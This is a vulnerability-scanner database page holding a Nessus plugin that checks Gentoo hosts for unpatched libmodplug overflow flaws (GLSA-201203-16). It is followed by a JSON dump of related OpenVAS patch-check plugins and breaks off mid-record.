GLSA-201203-16 : ModPlug: User-assisted execution of arbitrary code
2012-03-19T00:00:00
ID GENTOO_GLSA-201203-16.NASL Type nessus Reporter This script is Copyright (C) 2012-2021 Tenable Network Security, Inc. Modified 2012-03-19T00:00:00
Description
The remote host is affected by the vulnerability described in GLSA-201203-16
(ModPlug: User-assisted execution of arbitrary code)
Multiple vulnerabilities have been found in ModPlug:
The ReadS3M method in load_s3m.cpp fails to validate user-supplied
information, which could cause a stack-based buffer overflow
(CVE-2011-1574).
The 'CSoundFile::ReadWav()' function in load_wav.cpp contains an
integer overflow which could cause a heap-based buffer overflow
(CVE-2011-2911).
The 'CSoundFile::ReadS3M()' function in load_s3m.cpp contains
multiple boundary errors which could cause a stack-based buffer
overflow (CVE-2011-2912).
The 'CSoundFile::ReadAMS()' function in load_ams.cpp contains an
off-by-one error which could cause memory corruption (CVE-2011-2913).
The 'CSoundFile::ReadDSM()' function in load_dms.cpp contains an
off-by-one error which could cause memory corruption (CVE-2011-2914).
The 'CSoundFile::ReadAMS2()' function in load_ams.cpp contains an
off-by-one error which could cause memory corruption (CVE-2011-2915).
Impact :
A remote attacker could entice a user to open a specially crafted media
file, possibly resulting in execution of arbitrary code, or a Denial of
Service condition.
Workaround :
There is no known workaround at this time.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Gentoo Linux Security Advisory GLSA 201203-16.
#
# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.
# and licensed under the Creative Commons - Attribution / Share Alike
# license. See http://creativecommons.org/licenses/by-sa/3.0/
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(58381);
script_version("1.11");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/06");
script_cve_id("CVE-2011-1574", "CVE-2011-2911", "CVE-2011-2912", "CVE-2011-2913", "CVE-2011-2914", "CVE-2011-2915");
script_bugtraq_id(47248, 48979);
script_xref(name:"GLSA", value:"201203-16");
script_name(english:"GLSA-201203-16 : ModPlug: User-assisted execution of arbitrary code");
script_summary(english:"Checks for updated package(s) in /var/db/pkg");
script_set_attribute(
attribute:"synopsis",
value:
"The remote Gentoo host is missing one or more security-related
patches."
);
script_set_attribute(
attribute:"description",
value:
"The remote host is affected by the vulnerability described in GLSA-201203-16
(ModPlug: User-assisted execution of arbitrary code)
Multiple vulnerabilities have been found in ModPlug:
The ReadS3M method in load_s3m.cpp fails to validate user-supplied
information, which could cause a stack-based buffer overflow
(CVE-2011-1574).
The 'CSoundFile::ReadWav()' function in load_wav.cpp contains an
integer overflow which could cause a heap-based buffer overflow
(CVE-2011-2911).
The 'CSoundFile::ReadS3M()' function in load_s3m.cpp contains
multiple boundary errors which could cause a stack-based buffer
overflow (CVE-2011-2912).
The 'CSoundFile::ReadAMS()' function in load_ams.cpp contains an
off-by-one error which could cause memory corruption (CVE-2011-2913).
The 'CSoundFile::ReadDSM()' function in load_dms.cpp contains an
off-by-one error which could cause memory corruption (CVE-2011-2914).
The 'CSoundFile::ReadAMS2()' function in load_ams.cpp contains an
off-by-one error which could cause memory corruption (CVE-2011-2915).
Impact :
A remote attacker could entice a user to open a specially crafted media
file, possibly resulting in execution of arbitrary code, or a Denial of
Service condition.
Workaround :
There is no known workaround at this time."
);
script_set_attribute(
attribute:"see_also",
value:"https://security.gentoo.org/glsa/201203-16"
);
script_set_attribute(
attribute:"solution",
value:
"All ModPlug users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose '>=media-libs/libmodplug-0.8.8.4'
NOTE: This is a legacy GLSA. Updates for all affected architectures are
available since August 27, 2011. It is likely that your system is already
no longer affected by this issue."
);
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:'White_Phosphorus');
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:libmodplug");
script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux");
script_set_attribute(attribute:"patch_publication_date", value:"2012/03/16");
script_set_attribute(attribute:"plugin_publication_date", value:"2012/03/19");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.");
script_family(english:"Gentoo Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("qpkg.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo");
if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
flag = 0;
if (qpkg_check(package:"media-libs/libmodplug", unaffected:make_list("ge 0.8.8.4"), vulnerable:make_list("lt 0.8.8.4"))) flag++;
if (flag)
{
if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());
else security_warning(0);
exit(0);
}
else
{
tested = qpkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "ModPlug");
}
{"id": "GENTOO_GLSA-201203-16.NASL", "bulletinFamily": "scanner", "title": "GLSA-201203-16 : ModPlug: User-assisted execution of arbitrary code", "description": "The remote host is affected by the vulnerability described in GLSA-201203-16\n(ModPlug: User-assisted execution of arbitrary code)\n\n Multiple vulnerabilities have been found in ModPlug:\n The ReadS3M method in load_s3m.cpp fails to validate user-supplied\n information, which could cause a stack-based buffer overflow\n (CVE-2011-1574).\n The 'CSoundFile::ReadWav()' function in load_wav.cpp contains an\n integer overflow which could cause a heap-based buffer overflow\n (CVE-2011-2911).\n The 'CSoundFile::ReadS3M()' function in load_s3m.cpp contains\n multiple boundary errors which could cause a stack-based buffer\n overflow (CVE-2011-2912).\n The 'CSoundFile::ReadAMS()' function in load_ams.cpp contains an\n off-by-one error which could cause memory corruption (CVE-2011-2913).\n The 'CSoundFile::ReadDSM()' function in load_dms.cpp contains an\n off-by-one error which could cause memory corruption (CVE-2011-2914).\n The 'CSoundFile::ReadAMS2()' function in load_ams.cpp contains an\n off-by-one error which could cause memory corruption (CVE-2011-2915).\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted media\n file, possibly resulting in execution of arbitrary code, or a Denial of\n Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.", "published": "2012-03-19T00:00:00", "modified": "2012-03-19T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/58381", "reporter": "This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.", "references": ["https://security.gentoo.org/glsa/201203-16"], "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-1574", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "type": "nessus", "lastseen": "2021-01-07T10:53:32", "edition": 22, "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:71302", "OPENVAS:870483", "OPENVAS:1361412562310881372", "OPENVAS:136141256231071300", "OPENVAS:881372", "OPENVAS:136141256231071302", "OPENVAS:840800", "OPENVAS:1361412562310870483", "OPENVAS:1361412562310863809", "OPENVAS:1361412562310880974"]}, {"type": "gentoo", "idList": ["GLSA-201203-16", "GLSA-201203-14"]}, {"type": "ubuntu", "idList": ["USN-1255-1", "USN-1148-1"]}, {"type": "centos", "idList": ["CESA-2011:0477", "CESA-2011:1264"]}, {"type": "redhat", "idList": ["RHSA-2011:1264", "RHSA-2011:0477"]}, {"type": "oraclelinux", "idList": ["ELSA-2011-1264", "ELSA-2011-0477"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11574", "SECURITYVULNS:VULN:12028", "SECURITYVULNS:DOC:27284"]}, {"type": "nessus", "idList": ["ORACLELINUX_ELSA-2011-1264.NASL", "CENTOS_RHSA-2011-1264.NASL", "FEDORA_2011-10503.NASL", "FEDORA_2011-10544.NASL", "GENTOO_GLSA-201203-14.NASL", "UBUNTU_USN-1255-1.NASL", "REDHAT-RHSA-2011-1264.NASL", "FEDORA_2011-10452.NASL", "SL_20110906_GSTREAMER_PLUGINS_ON_SL4_X.NASL", "FEDORA_2011-12370.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2011:0943-1"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2226-1:EB2E2", "DEBIAN:DSA-2415-1:6A5A5"]}, {"type": "fedora", "idList": ["FEDORA:7589D28259", "FEDORA:2D39D110B4E", "FEDORA:0F99C110FD5", "FEDORA:73F37110CA6", "FEDORA:92B48110E1C"]}, {"type": "cve", "idList": ["CVE-2011-2914", "CVE-2011-2913", "CVE-2011-2915", "CVE-2011-1574", "CVE-2011-2912", "CVE-2011-2911"]}, {"type": "saint", "idList": ["SAINT:114116FE009CEA3405415E74B271E604", "SAINT:ECB5BDC1AA42880516325F32A021D963", "SAINT:B21ACF2EB9B8F35B9EB742A262AFFAD0"]}, {"type": "exploitdb", "idList": ["EDB-ID:17252"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:101216"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/VLC_MODPLUG_S3M"]}], "modified": "2021-01-07T10:53:32", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-01-07T10:53:32", "rev": 2}, "vulnersScore": 7.5}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201203-16.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58381);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-1574\", \"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_bugtraq_id(47248, 48979);\n script_xref(name:\"GLSA\", value:\"201203-16\");\n\n script_name(english:\"GLSA-201203-16 : ModPlug: User-assisted execution of arbitrary code\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201203-16\n(ModPlug: User-assisted execution of arbitrary code)\n\n Multiple vulnerabilities have been found in ModPlug:\n The ReadS3M method in load_s3m.cpp fails to validate user-supplied\n information, which could cause a stack-based buffer overflow\n (CVE-2011-1574).\n The 'CSoundFile::ReadWav()' function in load_wav.cpp contains an\n integer overflow which could cause a heap-based buffer overflow\n (CVE-2011-2911).\n The 'CSoundFile::ReadS3M()' function in load_s3m.cpp contains\n multiple boundary errors which could cause a stack-based buffer\n overflow (CVE-2011-2912).\n The 'CSoundFile::ReadAMS()' function in load_ams.cpp contains an\n off-by-one error which could cause memory corruption (CVE-2011-2913).\n The 'CSoundFile::ReadDSM()' function in load_dms.cpp contains an\n off-by-one error which could cause memory corruption (CVE-2011-2914).\n The 'CSoundFile::ReadAMS2()' function in load_ams.cpp contains an\n off-by-one error which could cause memory corruption (CVE-2011-2915).\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted media\n file, possibly resulting in execution of arbitrary code, or a Denial of\n Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201203-16\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All ModPlug users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-libs/libmodplug-0.8.8.4'\n NOTE: This is a legacy GLSA. Updates for all affected architectures are\n available since August 27, 2011. It is likely that your system is already\n no longer affected by this issue.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:libmodplug\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/03/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-libs/libmodplug\", unaffected:make_list(\"ge 0.8.8.4\"), vulnerable:make_list(\"lt 0.8.8.4\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ModPlug\");\n}\n", "naslFamily": "Gentoo Local Security Checks", "pluginID": "58381", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:libmodplug"], "scheme": null}
{"openvas": [{"lastseen": "2017-07-24T12:50:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-1574", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201203-16.", "modified": "2017-07-07T00:00:00", "published": "2012-04-30T00:00:00", "id": "OPENVAS:71302", "href": "http://plugins.openvas.org/nasl.php?oid=71302", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201203-16 (libmodplug)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities in ModPlug could result in execution of\n arbitrary code or Denial of Service.\";\ntag_solution = \"All ModPlug users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-libs/libmodplug-0.8.8.4'\n \n\nNOTE: This is a legacy GLSA. Updates for all affected architectures are\n available since August 27, 2011. It is likely that your system is\nalready\n no longer affected by this issue.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20201203-16\nhttp://bugs.gentoo.org/show_bug.cgi?id=362503\nhttp://bugs.gentoo.org/show_bug.cgi?id=379557\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 201203-16.\";\n\n \n \nif(description)\n{\n script_id(71302);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-1574\", \"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_version(\"$Revision: 6589 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 10:27:50 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-30 07:59:57 -0400 (Mon, 30 Apr 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201203-16 (libmodplug)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"media-libs/libmodplug\", unaffected: make_list(\"ge 0.8.8.4\"), vulnerable: make_list(\"lt 0.8.8.4\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-1574", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201203-16.", "modified": "2018-10-12T00:00:00", "published": "2012-04-30T00:00:00", "id": "OPENVAS:136141256231071302", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231071302", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201203-16 (libmodplug)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa_201203_16.nasl 11859 2018-10-12 08:53:01Z cfischer $\n#\n# Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.71302\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-1574\", \"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_version(\"$Revision: 11859 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 10:53:01 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-30 07:59:57 -0400 (Mon, 30 Apr 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201203-16 (libmodplug)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities in ModPlug could result in execution of\n arbitrary code or Denial of Service.\");\n script_tag(name:\"solution\", value:\"All ModPlug users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-libs/libmodplug-0.8.8.4'\n\n\nNOTE: This is a legacy GLSA. Updates for all affected architectures are\n available since August 27, 2011. It is likely that your system is\nalready\n no longer affected by this issue.\");\n\n script_xref(name:\"URL\", value:\"http://www.securityspace.com/smysecure/catid.html?in=GLSA%20201203-16\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=362503\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=379557\");\n script_tag(name:\"summary\", value:\"The remote host is missing updates announced in\nadvisory GLSA 201203-16.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-gentoo.inc\");\ninclude(\"revisions-lib.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"media-libs/libmodplug\", unaffected: make_list(\"ge 0.8.8.4\"), vulnerable: make_list(\"lt 0.8.8.4\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:39:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:1361412562310881372", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881372", "type": "openvas", "title": "CentOS Update for gstreamer-plugins CESA-2011:1264 centos4 x86_64", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for gstreamer-plugins CESA-2011:1264 centos4 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2011-September/017720.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881372\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:37:14 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"CESA\", value:\"2011:1264\");\n script_name(\"CentOS Update for gstreamer-plugins CESA-2011:1264 centos4 x86_64\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'gstreamer-plugins'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS4\");\n script_tag(name:\"affected\", value:\"gstreamer-plugins on CentOS 4\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The gstreamer-plugins packages contain plug-ins used by the GStreamer\n streaming-media framework to support a wide variety of media formats.\n\n An integer overflow flaw, a boundary error, and multiple off-by-one flaws\n were found in various ModPlug music file format library (libmodplug)\n modules, embedded in GStreamer. An attacker could create specially-crafted\n music files that, when played by a victim, would cause applications using\n GStreamer to crash or, potentially, execute arbitrary code. (CVE-2011-2911,\n CVE-2011-2912, CVE-2011-2913, CVE-2011-2914, CVE-2011-2915)\n\n All users of gstreamer-plugins are advised to upgrade to these updated\n packages, which contain backported patches to correct these issues. After\n installing the update, all applications using GStreamer (such as Rhythmbox)\n must be restarted for the changes to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"gstreamer-plugins\", rpm:\"gstreamer-plugins~0.8.5~1.EL.4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gstreamer-plugins-devel\", rpm:\"gstreamer-plugins-devel~0.8.5~1.EL.4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:50:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201203-14.", "modified": "2017-07-07T00:00:00", "published": "2012-04-30T00:00:00", "id": "OPENVAS:71300", "href": "http://plugins.openvas.org/nasl.php?oid=71300", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201203-14 (audacious-plugins)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities in Audacious Plugins could result in\n execution of arbitrary code or Denial of Service.\";\ntag_solution = \"All Audacious Plugins users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-plugins/audacious-plugins-3.1'\n \n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20201203-14\nhttp://bugs.gentoo.org/show_bug.cgi?id=383991\";\ntag_summary = 